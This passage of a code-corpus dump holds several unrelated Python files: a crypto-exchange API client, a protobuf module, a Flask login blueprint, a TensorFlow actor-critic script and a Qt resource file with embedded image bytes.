self.safe_value(self.options, 'coinbaseAccounts')\n if accounts is None:\n accounts = await self.privateGetCoinbaseAccounts()\n self.options['coinbaseAccounts'] = accounts # cache it\n self.options['coinbaseAccountsByCurrencyId'] = self.index_by(accounts, 'currency')\n currencyId = currency['id']\n account = self.safe_value(self.options['coinbaseAccountsByCurrencyId'], currencyId)\n if account is None:\n # eslint-disable-next-line quotes\n raise InvalidAddress(self.id + \" fetchDepositAddress() could not find currency code \" + code + \" with id = \" + currencyId + \" in self.options['coinbaseAccountsByCurrencyId']\")\n request = {\n 'id': account['id'],\n }\n response = await self.privatePostCoinbaseAccountsIdAddresses(self.extend(request, params))\n address = self.safe_string(response, 'address')\n tag = self.safe_string(response, 'destination_tag')\n return {\n 'currency': code,\n 'address': self.check_address(address),\n 'tag': tag,\n 'info': response,\n }\n\n def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):\n request = '/' + self.implode_params(path, params)\n query = self.omit(params, self.extract_params(path))\n if method == 'GET':\n if query:\n request += '?' + self.urlencode(query)\n url = self.implode_hostname(self.urls['api'][api]) + request\n if api == 'private':\n self.check_required_credentials()\n nonce = str(self.nonce())\n payload = ''\n if method != 'GET':\n if query:\n body = self.json(query)\n payload = body\n what = nonce + method + request + payload\n secret = self.base64_to_binary(self.secret)\n signature = self.hmac(self.encode(what), secret, hashlib.sha256, 'base64')\n headers = {\n 'CB-ACCESS-KEY': self.apiKey,\n 'CB-ACCESS-SIGN': signature,\n 'CB-ACCESS-TIMESTAMP': nonce,\n 'CB-ACCESS-PASSPHRASE': self.password,\n 'Content-Type': 'application/json',\n }\n return {'url': url, 'method': method, 'body': body, 'headers': headers}\n\n def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):\n if (code == 400) or (code == 404):\n if body[0] == '{':\n message = self.safe_string(response, 'message')\n feedback = self.id + ' ' + message\n self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)\n self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)\n raise ExchangeError(feedback) # unknown message\n raise ExchangeError(self.id + ' ' + body)\n\n async def request(self, path, api='public', method='GET', params={}, headers=None, body=None):\n response = await self.fetch2(path, api, method, params, headers, body)\n if not isinstance(response, basestring):\n if 'message' in response:\n raise ExchangeError(self.id + ' ' + self.json(response))\n return response\n"} {"ext": "py", "sha": "1a2f3b88bb85969cdd684698c37db040612c9d5d", "content": "# -*- coding: utf-8 -*-\n# Generated by the protocol buffer compiler. DO NOT EDIT!\n# source: account.proto\n\nimport sys\n_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))\nfrom google.protobuf import descriptor as _descriptor\nfrom google.protobuf import message as _message\nfrom google.protobuf import reflection as _reflection\nfrom google.protobuf import symbol_database as _symbol_database\n# @@protoc_insertion_point(imports)\n\n_sym_db = _symbol_database.Default()\n\n\n\n\nDESCRIPTOR = _descriptor.FileDescriptor(\n name='account.proto',\n package='types',\n syntax='proto3',\n serialized_options=None,\n serialized_pb=_b('\\n\\raccount.proto\\x12\\x05types\\\"\\x1a\\n\\x07\\x41\\x63\\x63ount\\x12\\x0f\\n\\x07\\x61\\x64\\x64ress\\x18\\x01 \\x01(\\x0c\\\"/\\n\\x0b\\x41\\x63\\x63ountList\\x12 \\n\\x08\\x61\\x63\\x63ounts\\x18\\x01 \\x03(\\x0b\\x32\\x0e.types.Accountb\\x06proto3')\n)\n\n\n\n\n_ACCOUNT = _descriptor.Descriptor(\n name='Account',\n full_name='types.Account',\n filename=None,\n file=DESCRIPTOR,\n containing_type=None,\n fields=[\n _descriptor.FieldDescriptor(\n name='address', full_name='types.Account.address', index=0,\n number=1, type=12, cpp_type=9, label=1,\n has_default_value=False, default_value=_b(\"\"),\n message_type=None, enum_type=None, containing_type=None,\n is_extension=False, extension_scope=None,\n serialized_options=None, file=DESCRIPTOR),\n ],\n extensions=[\n ],\n nested_types=[],\n enum_types=[\n ],\n serialized_options=None,\n is_extendable=False,\n syntax='proto3',\n extension_ranges=[],\n oneofs=[\n ],\n serialized_start=24,\n serialized_end=50,\n)\n\n\n_ACCOUNTLIST = _descriptor.Descriptor(\n name='AccountList',\n full_name='types.AccountList',\n filename=None,\n file=DESCRIPTOR,\n containing_type=None,\n fields=[\n _descriptor.FieldDescriptor(\n name='accounts', full_name='types.AccountList.accounts', index=0,\n number=1, type=11, cpp_type=10, label=3,\n has_default_value=False, default_value=[],\n message_type=None, enum_type=None, containing_type=None,\n is_extension=False, extension_scope=None,\n serialized_options=None, file=DESCRIPTOR),\n ],\n extensions=[\n ],\n nested_types=[],\n enum_types=[\n ],\n serialized_options=None,\n is_extendable=False,\n syntax='proto3',\n extension_ranges=[],\n oneofs=[\n ],\n serialized_start=52,\n serialized_end=99,\n)\n\n_ACCOUNTLIST.fields_by_name['accounts'].message_type = _ACCOUNT\nDESCRIPTOR.message_types_by_name['Account'] = _ACCOUNT\nDESCRIPTOR.message_types_by_name['AccountList'] = _ACCOUNTLIST\n_sym_db.RegisterFileDescriptor(DESCRIPTOR)\n\nAccount = _reflection.GeneratedProtocolMessageType('Account', (_message.Message,), {\n 'DESCRIPTOR' : _ACCOUNT,\n '__module__' : 'account_pb2'\n # @@protoc_insertion_point(class_scope:types.Account)\n })\n_sym_db.RegisterMessage(Account)\n\nAccountList = _reflection.GeneratedProtocolMessageType('AccountList', (_message.Message,), {\n 'DESCRIPTOR' : _ACCOUNTLIST,\n '__module__' : 'account_pb2'\n # @@protoc_insertion_point(class_scope:types.AccountList)\n })\n_sym_db.RegisterMessage(AccountList)\n\n\n# @@protoc_insertion_point(module_scope)\n"} {"ext": "py", "sha": "1a2f3b9c93e7776664f9189707036a7efce3ea75", "content": "from event_chain.app import controllers\nfrom event_chain.app import utils\nfrom event_chain.app.forms.admin import RegisterForm\nfrom flask import Blueprint\nfrom flask import g\nfrom flask import redirect\nfrom flask import render_template\nfrom flask import session\nfrom flask import url_for, flash\n\nadmin = Blueprint(\n 'admin',\n __name__\n)\n\n\n@admin.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n form = RegisterForm()\n if form.validate_on_submit():\n user = controllers.load_user(\n passphrase=form.passphrase.data,\n address=form.address.data,\n )\n session['user'] = user\n if user:\n return redirect(url_for('events.all'))\n else:\n flash(\"Passphrase and address don't match!\", 'error')\n return redirect(url_for('admin.login'))\n else:\n utils.flash_errors(form)\n return render_template('admin/login.html', form=form)\n\n\n@admin.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n form = RegisterForm()\n if form.validate_on_submit():\n user = controllers.register_user(\n form.name.data,\n form.passphrase.data\n )\n session['user'] = user\n g.logger.debug('New User registered!')\n else:\n utils.flash_errors(form)\n return render_template('admin/login.html', form=form)\n return redirect(url_for('events.all'))\n\n\n@admin.route(\"/logout\", methods=['GET', 'POST'])\ndef logout():\n session['user'] = None\n return redirect(url_for('admin.login'))\n"} {"ext": "py", "sha": "1a2f3c714a578c0dace55275e4327436d1f9416e", "content": "import numpy as np\nimport tensorflow as tf\nfrom mlagents.envs import UnityEnvironment\n\ninitKernelAndBias={\n 'kernel_initializer' : tf.random_normal_initializer(0., .1),\n 'bias_initializer' : tf.constant_initializer(0.1)\n}\n\nclass Actor(object):\n def __init__(self, sess, observationDim, actionDim, learning_rate=0.001, update_frequency=10):\n self.sess=sess\n self.s=tf.placeholder(tf.float32, [1,observationDim],\"state\")\n self.a=tf.placeholder(tf.float32, [1,actionDim],\"action\")\n self.advantage=tf.placeholder(tf.float32,[1,1],\"advantage\")\n self.update_frequency=update_frequency\n\n with tf.variable_scope(\"ActorMain\"):\n layer1 = tf.layers.dense(\n inputs=self.s,\n units=20,\n activation=tf.nn.relu,\n name='layer1',\n **initKernelAndBias\n )\n\n layer2=tf.layers.dense(\n inputs=layer1,\n units=20,\n activation=tf.nn.relu,\n name='layer2',\n **initKernelAndBias\n )\n\n self.mu = tf.layers.dense(\n inputs=layer2,\n units=actionDim,\n activation=None,\n name='mu',\n **initKernelAndBias\n )\n self.norm_dist = tf.distributions.Normal(loc=self.mu,scale=[1.]*actionDim)\n self.var1=tf.get_variable_scope().global_variables()\n\n with tf.variable_scope(\"Actor2\"):\n layer1 = tf.layers.dense(\n inputs=self.s,\n units=20,\n activation=tf.nn.relu,\n name='layer1',\n **initKernelAndBias,\n trainable=False\n )\n\n layer2=tf.layers.dense(\n inputs=layer1,\n units=20,\n activation=tf.nn.relu,\n name='layer2',\n **initKernelAndBias,\n trainable=False\n )\n self.mu = tf.layers.dense(\n inputs=layer2,\n units=actionDim,\n activation=None,\n name='mu',\n **initKernelAndBias,\n trainable=False\n )\n self.norm_dist_behavior = tf.distributions.Normal(loc=self.mu,scale=[1.]*actionDim)\n self.sample_op = self.norm_dist_behavior.sample()\n self.var2=tf.get_variable_scope().global_variables()\n\n with tf.variable_scope('exp_v'):\n self.log_prob = self.norm_dist.log_prob(self.a)\n self.exp_v = tf.reduce_mean(self.log_prob*self.advantage)\n with tf.variable_scope('train'):\n self.train_op = tf.train.AdamOptimizer(learning_rate).minimize(-self.exp_v)\n with tf.variable_scope('assign'):\n self.assign_target_to_behavior=[tf.assign(r, v) for r, v in zip(self.var2, self.var1)]\n\n def choose_action(self, s):\n return self.sess.run(self.sample_op,feed_dict={\n self.s:s\n })\n def learn(self, s, a, advantage, step):\n if step % self.update_frequency == 0:\n self.sess.run([self.train_op, self.assign_target_to_behavior],feed_dict={\n self.s:s,\n self.a:a,\n self.advantage:advantage\n })\n else:\n self.sess.run(self.train_op,feed_dict={\n self.s:s,\n self.a:a,\n self.advantage:advantage\n })\n\nclass Critic(object):\n def __init__(self, sess, observationDim, learning_rate=0.01, gamma=0.95):\n self.sess= sess\n\n self.s = tf.placeholder(tf.float32, [1,observationDim],\"state\")\n self.r = tf.placeholder(tf.float32, [1,1],\"reward\")\n self.v_ = tf.placeholder(tf.float32, [1,1], \"value_of_next\")\n\n with tf.variable_scope('Critic'):\n layer1 = tf.layers.dense(\n inputs=self.s,\n units=30,\n activation=tf.nn.relu,\n name='layer1',\n **initKernelAndBias\n )\n layer2 = tf.layers.dense(\n inputs=layer1,\n units=10,\n activation=tf.nn.relu,\n name='layer2',\n **initKernelAndBias\n )\n self.v = tf.layers.dense(\n inputs=layer2,\n units=1,\n activation=None,\n name='Value',\n **initKernelAndBias\n )\n with tf.variable_scope('square_advantage'):\n self.advantage = tf.reduce_mean(self.r + gamma*self.v_-self.v)\n self.loss = tf.square(self.advantage)\n\n with tf.variable_scope('train'):\n self.train_op = tf.train.AdamOptimizer(learning_rate).minimize(self.loss)\n\n def learn(self, s, r, s_):\n v_ = self.sess.run(self.v, feed_dict={\n self.s: s_\n })\n advantage, _ = self.sess.run([self.advantage, self.train_op], feed_dict={\n self.s: s,\n self.v_: v_,\n self.r: r\n })\n return advantage\n\nenv = UnityEnvironment()\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\nprint(brain.vector_observation_space_size)\nprint(brain.vector_action_space_size)\n\nsess = tf.Session()\n\nactor = Actor(\n sess=sess,\n observationDim=brain.vector_observation_space_size,\n actionDim=brain.vector_action_space_size[0],\n learning_rate=0.02,\n update_frequency=10\n)\ncritic = Critic(\n sess=sess,\n observationDim=brain.vector_observation_space_size,\n learning_rate=0.01,\n gamma=0.95\n)\n\nsess.run(tf.global_variables_initializer())\n\ntime=0\ngamma=0.9\nfor i_episode in range(5000):\n step=0\n discounted_reward=0\n observation = env.reset(train_mode=True)[brain_name]\n s=observation.vector_observations\n while True:\n time+=1\n step+=1\n action = np.squeeze(actor.choose_action(s), axis=0) \n # print(action)\n observation=env.step(action)[brain_name]\n \n reward=np.array(observation.rewards)\n discounted_reward*=gamma #有错\n discounted_reward+=reward[0]\n advantage = critic.learn(s,reward[np.newaxis,:],observation.vector_observations)\n advantage=[[advantage]]\n # print(advantage)\n actor.learn(s,action[np.newaxis,:],advantage, time)\n\n s=observation.vector_observations\n\n if observation.local_done[0]:\n print(\"episode:\", i_episode,\" steps:\", step,\" rewards:\", discounted_reward)\n break"} {"ext": "py", "sha": "1a2f3cd3370dbae7b4946f6dc729dbe64dad33be", "content": "# Resource object code (Python 3)\n# Created by: object code\n# Created by: The Resource Compiler for Qt version 6.2.0\n# WARNING! All changes made in this file will be lost!\n\nfrom PySide6 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00\\x0b\\x1b\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a \\x0a \\x0a \\x0a \\x0a \\\n \\\nimage/svg+xml\\x0a \\\n \\x0a \\\n \\x0a \\\n \\x0a \\\n \\x0a <\\\n/metadata>\\x0a \\x0a \\x0a\\\n fx\\x0a\\x0a\\\n\\x00\\x00\\x02\\xf3\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x09\\xfd\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\\n \\x0d\\x0a image/s\\\nvg+xml\\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\\n\\x0a \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\\n\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a\\x0d\\x0a\\\n\\x00\\x00\\x01\\x94\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x05\\xf8\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x09\\x8b\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a \\x0a \\x0a \\x0a \\\n i\\\nmage/svg+xml\\x0a \\\n \\x0a \\\n \\x0a \\x0a \\x0a \\\n\\x0a \\x0a \\\n\\x0a \\x0a\\\n fx\\x0a\\x0a\\\n\\x00\\x00\\x0b\\xd2\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n i\\\nmage/svg+xml\\x0d\\x0a \\\n \\x0d\\\n\\x0a \\x0d\\x0a\\\n \\\n\\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\\n\\x0a \\x0d\\\n\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a CSV\\\n\\x0d\\x0a\\x0d\\\n\\x0a\\\n\\x00\\x00\\x01\\x8a\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x01\\xb2\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x01\\xe2\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x02g\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\\n\\x00\\x00\\x01n\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\\n\\x00\\x00\\x92\\xc2\\\n\\x89\\\nPNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\\n\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x08\\x02\\x00\\x00\\x00{\\x1aC\\xad\\\n\\x00\\x00\\x00\\x01sRGB\\x00\\xae\\xce\\x1c\\xe9\\x00\\x00\\x00\\\n\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x00\\\n\\x09pHYs\\x00\\x00\\x0e\\xc3\\x00\\x00\\x0e\\xc3\\x01\\xc7o\\\n\\xa8d\\x00\\x00\\x92WIDATx^\\xed\\x9d\\x07`\\\n\\x1c\\xc5\\xd5\\xc7wv\\xaf\\xaa7\\xdb*\\x96+\\xee\\xb8\\x00\\\n\\xee\\xc6\\x06SM\\x87PC \\x10 \\x01\\x02\\xa1\\x84\\x12\\\n\\xc2G\\x80@\\x12j\\x80$\\x94@ \\x94\\x00!\\xf4b\\\n\\xc0\\x06\\xe3\\x0666\\x06\\x83\\x1b\\xb87\\xf5^O\\xd7\\xb6\\\n|\\xef\\xcd\\x8e\\x84e\\xe9\\xa4k\\xaa\\xfb~:\\xddm\\x99\\\n\\x9d\\x9d\\x9d\\xf2\\xfe3\\xb3\\xb3\\xb3\\xcc0\\x0c\\x89 \\x08\\x82\\\n\\xb0\\x1e\\xb2\\xf8%\\x08\\x82 ,\\x06\\x09\\x00A\\x10\\x84E\\\n!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80\\\n \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\\n\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\\n\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\\n\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\\n\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\\n\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0\\\n($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\\n\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04\\\naQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\\n\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\\n\\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8b\\\nB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00\\\nA\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\\n\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\\n\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82\\\n ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0(\\\n$\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\\n\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04a\\\nQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01\\\n \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\\n\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\\n\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\\n\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\\n\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\\n\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 \\\n,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\\n\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04\\\nAX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQ\\\nH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\\n\\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\\n\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02\\\n@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\\n\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\\n\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82\\\n \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\\n\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\\n\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04A\\\nX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\\n\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\\n\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\\n\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\\n\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84\\\nE!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\\n\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\\n\\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\\n\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04\\\nA\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\\n\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\\n\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\\n\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\\n\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\\n\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E\\\n!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80\\\n \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\\n\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\x82 ,\\x0a\\x09\\\n\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0($\\x00\\x04A\\\n\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\x10\\x04AX\\x14\\\n\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04aQH\\x00\\x08\\\n\\x82 ,\\x0a\\x09\\x00A\\x10\\x84E!\\x01 \\x08\\x82\\xb0\\\n($\\x00\\x04A\\x10\\x16\\x85\\x04\\x80 \\x08\\xc2\\xa2\\x90\\x00\\\n\\x10\\x04AX\\x14\\x12\\x00\\x82 \\x08\\x8bB\\x02@\\x10\\x04\\\naQH\\x00\\x08\\x82 ,\\x0a\\x09\\x00A\\x10\\x84Ea\\\n\\x86a\\x88E\\xa2_\\xc0\\x13\\xd4LS\\x06\\x7f\\xb0\\xca\\xf8\\\n\\x8a!1\\xd9\\x90\\x0c\\xa63P}fn#\\x08\\xc2\\xd2\\\n\\x90\\x00\\xf47L\\x01\\xd0\\xb4 \\xf3\\x96\\x1b\\x9eB\\x16\\xf0\\\nHL\\x97\\xec)\\xba;ON\\xca\\x91e\\x05\\xdc0\\x12\\\n\\x00\\x82 H\\x00\\xfa\\x1f\\x90\\xa0j\\xfd~m\\xcb3\\xb6\\\n\\xf2/\\xf4\\xfa\\xbd\\x92\\x04U~\\xa8\\xf83=q\\x04\\xcb\\\n>B\\x1fs\\x9d+c\\x08\\x09\\x00A\\x10\\x00\\x09@?\\\n\\x01\\xd2\\x11;x\\x0c\\xc9W\\xfa\\xad\\xf2\\xf9\\xcf%\\x7f\\xfd\\\n\\xc1V\\xde\\x90tp\\x90\\x98\\xcf\\x8e~N\\xc9\\x18\\x03\\xfb\\\n\\x18\\xa3;@\\x04ai\\xc8\\x04\\xf4\\x1f\\xc0\\xa6\\xab5;\\\n\\xe45\\xd7\\xca\\xbezq\\x17\\xe0\\x00\\x0c\\xbc# \\xb1\\xc6\\\nB\\xfd\\xb3\\x9f\\x1a\\xe5_\\xe3:A\\x10\\xd6\\x86\\x04\\xa0\\xff\\\n\\xa0k\\xba\\xfa\\xed\\x03Rc\\x91\\x0eu\\xff6\\xe6\\x9da\\\n_\\x10\\xfc\\x19\\xccW\\xed\\xff\\xfe\\x05CW\\xc5\\x0e\\x82 \\\n\\xac\\x0a\\x09@\\xffA-\\xfd\\xc2^\\xfc\\x09\\xef\\xdbi\\xf7\\\n6\\xaf\\xcc\\x9b\\x00\\xb8\\xdd^\\xbc4\\xd8Tan%\\x08\\\n\\xc2\\xb2\\x90\\x00\\xf4\\x17\\x0c]\\xde\\xf9*\\xd6\\xfd\\xc3Ak\\\n*Z\\xf7\\x86X&\\x08\\xc2\\xaa\\x90\\x00\\xf4\\x13\\x0c]5\\\n\\x9a\\xca\\x99\\xde\\xb6\\xef\\xa7\\x0d\\x86\\xa1\\x1bF\\xbe\\xb1Z\\xac\\\n\\x12\\x04aUH\\x00\\xfa\\x09\\x86\\xae\\xe9\\xbaf0\\xc9h\\\n{\\xff\\xf7 x\\xf7\\x90\\xe1k\\x14\\xab\\x04AX\\x15\\x12\\\n\\x80~\\x02S\\xec\\xcc\\xe6\\xc0\\x85\\xce\\xdb\\x00\\x06(\\x80\\x9a\\\n\\x98-\\xd6\\x08\\x82\\xb0*$\\x00\\xfd\\x04\\xc6\\x149s\\x12\\\n,t\\xfaX\\x07(\\x84\\xceXc\\xd6\\x99\\xf8\\xe8\\x80\\xae\\\n\\xd3\\x83 \\x04aYH\\x00\\xfa\\x0b\\x8c\\xa9\\xc3/\\x94l\\\nn\\xec\\x04\\xea\\x10|^Lv&\\x0f>\\x0c\\x16\\xb1-\\\n@\\x10\\x84U!\\x01\\xe8?\\xb82F\\xfaF\\xdf(\\x85\\\n\\xf3|\\xaf\\xe6W\\x96\\x9e\\xe7m\\xa8\\xe6jA-\\x00\\x82\\\n\\xb0($\\x00\\xfd\\x07\\x83I\\x09\\x13.0\\xf2\\x8e\\xc1%\\\n\\xec\\xdf\\xe1\\xe8\\x12N\\x01a.\\xe2\\xf0\\x1fX\\xc7\\x87\\x01\\\nXS![\\xf5k_]\\x09\\x1e\\xc8\\xb7\\x83\\x03\\xee\\x0d\\\nA\\x10V\\x81\\xe6\\x02\\xea'\\x98\\xe9\\x88f>P\\xeb_\\\ns\\x97\\xad\\xe0\\x03\\xc9\\xc0G\\x7fq;\\x13I\\x0c?f\\\n\\x8f\\x8fxL\\xcc\\x90\\xb4\\xe4\\xa1\\xc6\\xb1\\xef8\\x923`\\\n\\x1d\\x9f\\x13\\xa3\\x1e!\\x82\\xb0\\x12$\\x00\\xfd\\x04L\\xc7f\\\n\\x03\\xaf\\xeb\\xaaQ\\xb8D\\xdb\\xf7\\xb1V\\xb5\\xc5\\xa6\\xd6\\xc1\\\n\\x96&-\\xc3\\x99;N\\x93\\x14\\xe7\\xbe\\xb7\\x0dC3\\xdd\\\n\\x81\\xbd\\x87\\xe3\\xb4\\xcc#\\xa4#\\x9ft\\xa4d\\xf3C\\xf9\\\nv\\xbeD\\x10D\\xbf\\x87\\x04\\xa0\\xdf\\x822\\x10\\xa8g\\x9a\\\n\\x0au{U\\xb7\\xdb\\x5cI\\x90\\xd4Mk\\xefq\\xec~\\\n\\x917\\x09t1\\x1b\\xa8!\\xe9\\xc9\\xc3\\xd4\\xe3\\xdeKH\\\nJE\\x1d\\x91\\x98L\\xb3\\x84\\x12\\x845 \\x01\\xe8\\xb7\\xf0\\\n\\x94E\\x83n\\xae\\xc1\\x87\\x19,\\xe0\\xf7hk\\xef\\xb0\\x15\\\n\\xbe'k\\x9a!\\xe3.p\\xc6\\x98\\xa1e\\xcd\\x90\\xe6\\xfc\\\n\\xdd\\x91\\x9c\\x83\\xdd@\\xd4\\x04 \\x08k@\\x02\\xd0oi\\\nNY\\xb0\\xe6\\xad\\x92XS\\x03\\xfeu\\x7fr\\xec|\\x11\\\nS_\\xbc.\\x066\\xcbz\\xfa\\xa1\\xc6Q/9\\x93\\xd2\\\n\\xcd\\xae!\\xd8KJ@\\x10\\xfd\\x1bj\\xec\\xf7[\\xd0~\\\n#-\\x0b\\x02\\xc5f\\xb7\\x1f~[0\\xffT\\xa8\\xf9\\x83\\\n\\x02\\xa0\\xa5\\xc7n\\x7fC\\xa9\\xda$\\xad\\xfce\\xa0\\xae\\x00\\\n\\x9b\\x0dmd\\x83 